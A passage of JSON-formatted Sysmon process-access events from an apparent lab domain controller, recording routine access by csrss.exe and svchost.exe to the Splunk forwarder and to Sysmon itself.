Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001090340600}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001090340600}","TargetProcessId":"4584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
